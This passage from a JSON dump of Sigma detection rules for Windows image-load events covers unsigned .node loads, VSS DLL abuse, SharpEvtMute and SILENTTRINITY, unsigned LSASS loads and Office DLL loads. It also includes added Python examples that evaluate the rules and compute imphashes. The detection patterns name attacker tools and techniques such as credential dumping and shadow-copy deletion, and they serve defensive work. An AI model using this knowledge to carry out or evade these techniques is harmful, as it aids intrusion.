    "content": "title: Unsigned .node File Loaded\nid: e5f5c693-52d7-4de5-88ae-afbfbce85595\nstatus: experimental\ndescription: |\n    Detects the loading of unsigned .node files.\n    Adversaries may abuse a lack of .node integrity checking to execute arbitrary code inside of trusted applications such as Slack.\n    .node files are native add-ons for Electron-based applications, which are commonly used for desktop applications like Slack, Discord, and Visual Studio Code.\n    This technique has been observed in the DripLoader malware, which uses unsigned .node files to load malicious native code into Electron applications.\nreferences:\n    - https://www.coreycburton.com/blog/driploader-case-study\n    - https://github.com/CoreyCBurton/DripLoaderNG\n    - https://www.electronjs.org/docs/latest/tutorial/native-code-and-electron\nauthor: Jonathan Beierle (@hullabrian)\ndate: 2025-11-22\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1129\n    - attack.t1574.001\n    - attack.t1036.005\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_node_extension:\n        ImageLoaded|endswith: '.node'\n    selection_status:\n        - Signed: 'false'\n        - SignatureStatus: 'Unavailable'\n    filter_optional_vscode_jupyter:\n        Image|endswith: '\\Code.exe'\n        ImageLoaded|contains: '.vscode\\extensions\\ms-toolsai.jupyter-'\n        ImageLoaded|endswith:\n            - '\\electron.napi.node'\n            - '\\node.napi.glibc.node'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - VsCode extensions or similar legitimate tools might use unsigned .node files. These should be investigated on a case-by-case basis, and whitelisted if determined to be benign.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml",
    "content": "title: Suspicious Volume Shadow Copy VSS_PS.dll Load\nid: 333cdbe8-27bb-4246-bf82-b41a0dca4b70\nrelated:\n    - id: 48bfd177-7cf2-412b-ad77-baf923489e82 # vsstrace.dll\n      type: similar\n    - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 # vssapi.dll\n      type: similar\nstatus: test\ndescription: |\n    Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes.\n    It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts.\n    The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity.\nreferences:\n    - https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add\n    - https://twitter.com/am0nsec/status/1412232114980982787\nauthor: Markus Neis, @markus_neis\ndate: 2021-07-07\nmodified: 2025-07-11\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\vss_ps.dll'\n    filter_main_legit:\n        Image|startswith: 'C:\\Windows\\'\n        Image|endswith:\n            - '\\clussvc.exe'\n            - '\\dismhost.exe'\n            - '\\dllhost.exe'\n            - '\\inetsrv\\appcmd.exe'\n            - '\\inetsrv\\iissetup.exe'\n            - '\\msiexec.exe'\n            - '\\rundll32.exe'\n            - '\\searchindexer.exe'\n            - '\\srtasks.exe'\n            - '\\svchost.exe'\n            - '\\System32\\SystemPropertiesAdvanced.exe'\n            - '\\taskhostw.exe'\n            - '\\thor.exe'\n            - '\\thor64.exe'\n            - '\\tiworker.exe'\n            - '\\vssvc.exe'\n            - '\\vssadmin.exe'\n            - '\\WmiPrvSE.exe'\n            - '\\wsmprovhost.exe'\n    filter_main_update:\n        CommandLine|startswith: 'C:\\$WinREAgent\\Scratch\\'\n        CommandLine|contains: '\\dismhost.exe {'\n    filter_main_image_null:\n        Image: null\n    filter_optional_programfiles:\n        # When using this rule in your environment replace the \"Program Files\" folder by the exact applications you know use this. Examples would be software such as backup solutions\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
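How the detection sections of the rules above actually evaluate, as an added example in Python written for this page (not code from the Sigma project or from pySigma). It implements only the subset of Sigma semantics these image_load rules use and runs it over constructed Sysmon Event ID 7 style records. It serves two rules at once: "Load Of RstrtMgr.DLL By An Uncommon Process", whose filter_main_user_software_installations suppresses an event only when all three Image conditions hold, and "Suspicious Volume Shadow Copy VSS_PS.dll Load", whose filter_main_image_null uses `Image: null` to drop events that carry no Image field. The rule dicts are hand transcriptions of the YAML with the long path lists cut down to the entries the sample events exercise, and the event records are constructed, not real telemetry.

```python
"""Mini evaluator for the Sigma constructs used by the image_load rules above.
Added example, not Sigma project code. Supports map selections (AND of fields),
list selections (OR of maps), list values (OR, or AND under `all`), the
startswith/endswith/contains modifiers, `null` values and `1 of <glob>`.
Matching is case-insensitive, as the Sigma specification requires."""
from fnmatch import fnmatch


def _match_value(value, modifiers, pattern):
    """One event field value against one pattern; pattern None is Sigma's `null`."""
    if pattern is None:
        return value is None                  # field absent (or null) in the event
    if value is None:
        return False
    v, p = str(value).lower(), str(pattern).lower()
    if "startswith" in modifiers:
        return v.startswith(p)
    if "endswith" in modifiers:
        return v.endswith(p)
    if "contains" in modifiers:
        return p in v
    return v == p


def _match_field(event, key, patterns):
    """`Field|mod|...: value-or-list`: OR over the list, AND when `all` is set."""
    field, *modifiers = key.split("|")
    values = patterns if isinstance(patterns, list) else [patterns]
    hits = [_match_value(event.get(field), modifiers, p) for p in values]
    return all(hits) if "all" in modifiers else any(hits)


def _match_selection(event, selection):
    """A map is an AND of its fields; a list of maps is an OR."""
    if isinstance(selection, list):
        return any(_match_selection(event, item) for item in selection)
    return all(_match_field(event, k, v) for k, v in selection.items())


def matches(rule, event):
    """True when the event satisfies the rule's condition."""
    results = {name: _match_selection(event, sel)
               for name, sel in rule["detection"].items()}

    def one_of(glob):                         # `1 of filter_main_*`
        return any(hit for name, hit in results.items() if fnmatch(name, glob))

    return rule["condition"](results, one_of)


def _uncommon_loader(results, one_of):
    """condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*"""
    return (results["selection"] and not one_of("filter_main_*")
            and not one_of("filter_optional_*"))


# Detection sections transcribed from the two rules; path lists shortened to
# the entries the constructed events below exercise.
RSTRTMGR_UNCOMMON = {
    "detection": {
        "selection": [
            {"ImageLoaded|endswith": "\\RstrtMgr.dll"},
            {"OriginalFileName": "RstrtMgr.dll"},
        ],
        "filter_main_generic": {
            "Image|startswith": ["C:\\Program Files\\", "C:\\Windows\\System32\\"],
        },
        "filter_main_user_software_installations": {   # Inno Setup: all three must hold
            "Image|startswith": "C:\\Users\\",
            "Image|contains|all": ["\\AppData\\Local\\Temp\\is-", ".tmp\\"],
            "Image|endswith": ".tmp",
        },
    },
    "condition": _uncommon_loader,
}
VSS_PS_SUSP = {
    "detection": {
        "selection": {"ImageLoaded|endswith": "\\vss_ps.dll"},
        "filter_main_legit": {
            "Image|startswith": "C:\\Windows\\",
            "Image|endswith": ["\\svchost.exe", "\\vssvc.exe", "\\vssadmin.exe"],
        },
        "filter_main_image_null": {"Image": None},      # drops events lacking Image
        "filter_optional_programfiles": {
            "Image|startswith": ["C:\\Program Files\\", "C:\\Program Files (x86)\\"],
        },
    },
    "condition": _uncommon_loader,
}

RSTRTMGR = "C:\\Windows\\System32\\RstrtMgr.dll"
VSS_PS = "C:\\Windows\\System32\\vss_ps.dll"
# Constructed Sysmon Event ID 7 style records (field subset), not real telemetry.
EVENTS = [
    {"Image": "C:\\Users\\Public\\update.exe", "ImageLoaded": RSTRTMGR},       # 0 alert
    {"Image": "C:\\Windows\\System32\\svchost.exe", "ImageLoaded": RSTRTMGR},  # 1 generic filter
    {"Image": "C:\\Users\\a\\AppData\\Local\\Temp\\is-K1J2.tmp\\setup.tmp",
     "ImageLoaded": RSTRTMGR},                                               # 2 installer filter
    {"Image": "C:\\Users\\a\\AppData\\Local\\Temp\\is-K1J2.tmp\\setup.exe",
     "ImageLoaded": RSTRTMGR},                                               # 3 alert: not *.tmp
    {"Image": "C:\\Users\\Public\\update.exe", "ImageLoaded": VSS_PS},         # 4 alert
    {"ImageLoaded": VSS_PS},                                                   # 5 null-Image filter
    {"Image": "C:\\Windows\\Temp\\x.exe", "ImageLoaded": VSS_PS},              # 6 alert: name not listed
]


def alerts(rule, events=EVENTS):
    """Indices of the events the rule fires on."""
    return [i for i, ev in enumerate(events) if matches(rule, ev)]
```

`alerts(RSTRTMGR_UNCOMMON)` returns `[0, 3]` and `alerts(VSS_PS_SUSP)` returns `[4, 6]`. Event 3 shows why the installer filter is a map and not a list: the image sits in an `is-*.tmp` directory but is not itself a `.tmp`, so one field fails and the filter does not suppress. Event 5 shows the `Image: null` filter doing its job on a record with no Image field, and event 6 shows that `Image|startswith: 'C:\Windows\'` alone is not enough, the executable name must also be in the allow list.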
  {
    "path": "rules/windows/image_load/image_load_dll_vssapi_susp_load.yml",
    "content": "title: Suspicious Volume Shadow Copy Vssapi.dll Load\nid: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8\nrelated:\n    - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 # vss_ps.dll\n      type: similar\n    - id: 48bfd177-7cf2-412b-ad77-baf923489e82 # vsstrace.dll\n      type: similar\nstatus: test\ndescription: Detects the image load of the VSS DLL vssapi.dll by uncommon executables\nreferences:\n    - https://github.com/ORCx41/DeleteShadowCopies\nauthor: frack113\ndate: 2022-10-31\nmodified: 2025-10-17\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\vssapi.dll'\n    filter_main_windows:\n        - Image:\n              - 'C:\\Windows\\explorer.exe'\n              - 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n        - Image|startswith:\n              - 'C:\\Windows\\System32\\'\n              - 'C:\\Windows\\SysWOW64\\'\n              - 'C:\\Windows\\Temp\\{' # Installers\n              - 'C:\\Windows\\WinSxS\\'\n    filter_main_program_files:\n        # When using this rule in your environment replace the \"Program Files\" folder by the exact applications you know use this. Examples would be software such as backup solutions\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_main_null_image:\n        Image: null\n    filter_optional_programdata_packagecache:\n        # The following filter is required because of many FPs caused by:\n        #   C:\\ProgramData\\Package Cache\\{10c6cfdc-27af-43fe-bbd3-bd20aae88451}\\dotnet-sdk-3.1.425-win-x64.exe\n        #   C:\\ProgramData\\Package Cache\\{b9cfa33e-ace4-49f4-8bb4-82ded940990a}\\windowsdesktop-runtime-6.0.11-win-x86.exe\n        #   C:\\ProgramData\\Package Cache\\{50264ff2-ad47-4569-abc4-1c350f285fb9}\\aspnetcore-runtime-6.0.11-win-x86.exe\n        #   C:\\ProgramData\\Package Cache\\{2dcef8c3-1563-4149-a6ec-5b6c98500d7d}\\dotnet-sdk-6.0.306-win-x64.exe\n        #   etc.\n        Image|startswith: 'C:\\ProgramData\\Package Cache\\'\n    filter_optional_avira:\n        Image|contains|all:\n            - '\\temp\\is-'\n            - '\\avira_system_speedup.tmp'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_vsstrace_susp_load.yml",
    "content": "title: Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load\nid: 48bfd177-7cf2-412b-ad77-baf923489e82\nrelated:\n    - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 # vss_ps.dll\n      type: similar\n    - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 # vssapi.dll\n      type: similar\nstatus: test\ndescription: Detects the image load of VSS DLL by uncommon executables\nreferences:\n    - https://github.com/ORCx41/DeleteShadowCopies\nauthor: frack113\ndate: 2023-02-17\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\vsstrace.dll'\n    filter_main_windows:\n        - Image:\n              - 'C:\\Windows\\explorer.exe'\n              - 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n        - Image|startswith:\n              - 'C:\\Windows\\System32\\'\n              - 'C:\\Windows\\SysWOW64\\'\n              - 'C:\\Windows\\Temp\\{' # Installers\n              - 'C:\\Windows\\WinSxS\\'\n              - 'C:\\ProgramData\\Package Cache\\{'  # Microsoft Visual Redistributable installer  VC_redist/vcredist EXE\n    filter_main_program_files:\n        # When using this rule in your environment replace the \"Program Files\" folder by the exact applications you know use this. Examples would be software such as backup solutions\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_optional_recovery:\n        Image|startswith: 'C:\\$WinREAgent\\Scratch\\'\n    filter_main_null_image:\n        Image: null # Observed through Aurora\n    filter_optional_avira:\n        Image|contains|all:\n            - '\\temp\\is-'\n            - '\\avira_system_speedup.tmp'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_hktl_sharpevtmute.yml",
    "content": "title: HackTool - SharpEvtMute DLL Load\nid: 49329257-089d-46e6-af37-4afce4290685\nrelated:\n    - id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c # Process Creation\n      type: similar\nstatus: test\ndescription: Detects the load of EvtMuteHook.dll, a key component of SharpEvtMute, a tool that tampers with the Windows event logs\nreferences:\n    - https://github.com/bats3c/EvtMute\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-07\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Hashes|contains: 'IMPHASH=330768A4F172E10ACB6287B87289D83B'\n    condition: selection\nfalsepositives:\n    - Other DLLs with the same Imphash\nlevel: high\n"
  },
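Why a rule can pivot on `Hashes|contains: 'IMPHASH=...'` and why "other DLLs with the same Imphash" is a real false positive, as an added example in Python written for this page (not code from the Sigma project or from EvtMute). It reimplements the imphash recipe that pefile and VirusTotal use on constructed import tables instead of a parsed PE, then checks a Sysmon-style Hashes value the way the rule's `contains` match does. The import lists, the IMPHASH-only Hashes value and the `ord<N>` rendering of unnamed imports are assumptions of the example; pefile additionally maps ordinals to names for ws2_32, wsock32 and oleaut32, which is omitted here.

```python
"""Import hash (imphash) from an import table, plus the Sigma `Hashes|contains` check.
Added example; not Sigma project code and not derived from EvtMuteHook.dll.
Recipe (as in pefile): for each imported function, in import-table order, emit
"<dll without .dll/.ocx/.sys>.<function>" in lower case, join with commas, MD5."""
import hashlib


def import_string(imports):
    """imports: [(dll, function_name_or_ordinal), ...] in import-table order."""
    parts = []
    for dll, func in imports:
        lib = dll.lower()
        base, dot, ext = lib.rpartition(".")
        if dot and ext in ("dll", "ocx", "sys"):   # only these extensions are stripped
            lib = base
        # Simplification: every ordinal becomes ord<N>; pefile has name tables for
        # ws2_32, wsock32 and oleaut32 that are not reproduced here.
        name = func.lower() if isinstance(func, str) else f"ord{func}"
        parts.append(f"{lib}.{name}")
    return ",".join(parts)


def imphash(imports):
    """MD5 of the import string: order-sensitive, but blind to the code itself."""
    return hashlib.md5(import_string(imports).encode("ascii")).hexdigest()


def hashes_field(imports):
    """Sysmon-style Hashes value (upper-case hex as Sysmon logs it). Only the
    IMPHASH component is emitted in this constructed value."""
    return f"IMPHASH={imphash(imports).upper()}"


def rule_hits(hashes_value, target_imphash):
    """`Hashes|contains: 'IMPHASH=<hash>'`, case-insensitive as Sigma specifies."""
    return f"imphash={target_imphash}".lower() in hashes_value.lower()


def collides(imports_a, imports_b):
    """True when two import tables yield the same imphash (the rule's FP case)."""
    return imphash(imports_a) == imphash(imports_b)


# Constructed import tables; not taken from EvtMuteHook.dll or any real binary.
HOOK_DLL = [
    ("KERNEL32.dll", "GetProcAddress"),
    ("KERNEL32.dll", "VirtualProtect"),
    ("KERNEL32.dll", "LoadLibraryA"),
    ("USER32.dll", 5),                 # import by ordinal
]
# Different code, same import table (only letter case differs): same imphash.
LOOKALIKE = [("kernel32.DLL", "getprocaddress"), ("kernel32.DLL", "virtualprotect"),
             ("kernel32.DLL", "loadlibrarya"), ("user32.DLL", 5)]
# Same imports in a different order: the hash changes, because order is part of it.
REORDERED = list(reversed(HOOK_DLL))
```

`collides(HOOK_DLL, LOOKALIKE)` is true and `collides(HOOK_DLL, REORDERED)` is false, which is the whole trade-off behind the rule: an imphash survives recompilation and string changes as long as the linker emits the same imports in the same order, so it is a cheap pivot for a known tool, but any unrelated binary with an identical import table, including a benign one, produces the same `IMPHASH=` value and fires the rule.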
  {
    "path": "rules/windows/image_load/image_load_hktl_silenttrinity_stager.yml",
    "content": "title: HackTool - SILENTTRINITY Stager DLL Load\nid: 75c505b1-711d-4f68-a357-8c3fe37dbf2d\nrelated:\n    - id: 03552375-cc2c-4883-bbe4-7958d5a980be # Process Creation\n      type: derived\nstatus: test\ndescription: Detects SILENTTRINITY stager dll loading activity\nreferences:\n    - https://github.com/byt3bl33d3r/SILENTTRINITY\nauthor: Aleksey Potapov, oscd.community\ndate: 2019-10-22\nmodified: 2023-02-17\ntags:\n    - attack.command-and-control\n    - attack.t1071\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Description|contains: 'st2stager'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml",
    "content": "title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load\nid: f354eba5-623b-450f-b073-0b5b2773b6aa\nrelated:\n    - id: e554f142-5cf3-4e55-ace9-a1b59e0def65\n      type: obsolete\n    - id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa\n      type: similar\nstatus: test\ndescription: Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga\ndate: 2020-10-12\nmodified: 2022-12-18\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1021.003\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\Internet Explorer\\iexplore.exe'\n        ImageLoaded|endswith: '\\Internet Explorer\\iertutil.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/image_load/image_load_lsass_unsigned_image_load.yml",
    "content": "title: Unsigned Image Loaded Into LSASS Process\nid: 857c8db3-c89b-42fb-882b-f681c7cf4da2\nstatus: test\ndescription: Detects the loading of an unsigned image (DLL, EXE) into the LSASS process\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-10-22\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\lsass.exe'\n        Signed: 'false'\n    condition: selection\nfalsepositives:\n    - Valid user connecting using RDP\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_dotnet_assembly_dll_load.yml",
    "content": "title: DotNET Assembly DLL Loaded Via Office Application\nid: ff0f2b05-09db-4095-b96d-1b75ca24894a\nstatus: test\ndescription: Detects any assembly DLL being loaded by an Office Product\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2023-03-29\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|startswith: 'C:\\Windows\\assembly\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_dotnet_clr_dll_load.yml",
    "content": "title: CLR DLL Loaded Via Office Applications\nid: d13c43f0-f66b-4279-8b2c-5912077c1780\nstatus: test\ndescription: Detects CLR DLL being loaded by an Office Product\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2023-03-29\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\outlook.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|contains: '\\clr.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_dotnet_gac_dll_load.yml",
    "content": "title: GAC DLL Loaded Via Office Applications\nid: 90217a70-13fc-48e4-b3db-0d836c5824ac\nstatus: test\ndescription: Detects any GAC DLL being loaded by an Office Product\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2023-02-10\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|startswith: 'C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL'\n    condition: selection\nfalsepositives:\n    - Legitimate macro usage. Add the appropriate filter according to your environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_excel_xll_susp_load.yml",
    "content": "title: Microsoft Excel Add-In Loaded From Uncommon Location\nid: af4c4609-5755-42fe-8075-4effb49f5d44\nrelated:\n    - id: c5f4b5cb-4c25-4249-ba91-aa03626e3185\n      type: derived\nstatus: test\ndescription: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location\nreferences:\n    - https://www.mandiant.com/resources/blog/lnk-between-browsers\n    - https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-12\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\excel.exe'\n        ImageLoaded|contains:\n            # Note: Add or remove locations from this list based on your internal policy\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Perflogs\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Tasks\\'\n        ImageLoaded|endswith: '.xll'\n    condition: selection\nfalsepositives:\n    - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_outlook_outlvba_load.yml",
    "content": "title: Microsoft VBA For Outlook Addin Loaded Via Outlook\nid: 9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed\nstatus: test\ndescription: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\nmodified: 2024-03-12\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\outlook.exe'\n        ImageLoaded|endswith: '\\outlvba.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate macro usage. Add the appropriate filter according to your environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_powershell_dll_load.yml",
    "content": "title: PowerShell Core DLL Loaded Via Office Application\nid: bb2ba6fb-95d4-4a25-89fc-30bb736c021a\nstatus: test\ndescription: Detects PowerShell core DLL being loaded by an Office Product\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-01\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\outlook.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|contains:\n            - '\\System.Management.Automation.Dll'\n            - '\\System.Management.Automation.ni.Dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_vbadll_load.yml",
    "content": "title: VBA DLL Loaded Via Office Application\nid: e6ce8457-68b1-485b-9bdd-3c2b5d679aa9\nstatus: test\ndescription: Detects VBA DLLs loaded by an Office application, which could indicate the presence of VBA macros.\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2023-02-10\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|endswith:\n            - '\\VBE7.DLL'\n            - '\\VBEUI.DLL'\n            - '\\VBE7INTL.DLL'\n    condition: selection\nfalsepositives:\n    - Legitimate macro usage. Add the appropriate filter according to your environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_rundll32_remote_share_load.yml",
    "content": "title: Remote DLL Load Via Rundll32.EXE\nid: f40017b3-cb2e-4335-ab5d-3babf679c1de\nstatus: test\ndescription: Detects a remote DLL load event via \"rundll32.exe\".\nreferences:\n    - https://github.com/gabe-k/themebleed\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-18\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        ImageLoaded|startswith: '\\\\\\\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml",
    "content": "title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load\nid: b439f47d-ef52-4b29-9a2f-57d8a96cb6b8\nstatus: test\ndescription: Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.\nreferences:\n    - https://twitter.com/HunterPlaybook/status/1301207718355759107\n    - https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/\n    - https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-09-02\nmodified: 2023-02-22\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\scrcons.exe'\n        ImageLoaded|endswith:\n            - '\\vbscript.dll'\n            - '\\wbemdisp.dll'\n            - '\\wshom.ocx'\n            - '\\scrrun.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate event consumers\n    - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_7za.yml",
    "content": "title: Potential 7za.DLL Sideloading\nid: 4f6edb78-5c21-42ab-a558-fd2a6fc1fd57\nstatus: test\ndescription: Detects potential DLL sideloading of \"7za.dll\"\nreferences:\n    - https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d\nauthor: X__Junior\ndate: 2023-06-09\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\7za.dll'\n    filter_main_legit_path:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate third party application located in \"AppData\" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed.\nlevel: low\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_abused_dlls_susp_paths.yml",
